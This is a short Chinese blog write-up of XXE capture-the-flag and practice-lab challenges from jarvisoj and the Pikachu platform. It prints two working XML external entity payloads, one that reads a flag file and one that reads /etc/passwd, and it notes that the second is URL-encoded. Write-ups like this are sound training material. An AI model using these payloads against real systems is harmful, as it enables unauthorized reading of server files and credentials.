美文网首页
XXE CTF题目

XXE CTF题目

作者: 小小怪吃吃吃 | 来源:发表于2018-10-25 17:46 被阅读0次

    api调用

    1、链接:jarvisoj

    2、解题方法:
    xxe漏洞读取文件。
    payload:

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE poem [
     <!ENTITY xxe SYSTEM "file:///home/ctf/flag.txt">
     ]>
    <poem>
      &xxe;
    </poem>
    
    image.png

    Pikachu漏洞联系平台-XXE

    1、解题方法:
    题目已经给出api,抓包发现接口处参数经过url编码。


    image.png

    payload(记得进行url编码):

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE poem [
     <!ENTITY xxe SYSTEM "file:///etc/passwd">
     ]>
    <poem>
      &xxe;
    </poem>
    

    2、源码分析


    image.png

    相关文章

      网友评论

          本文标题:XXE CTF题目

          本文链接:https://www.haomeiwen.com/subject/lphctqtx.html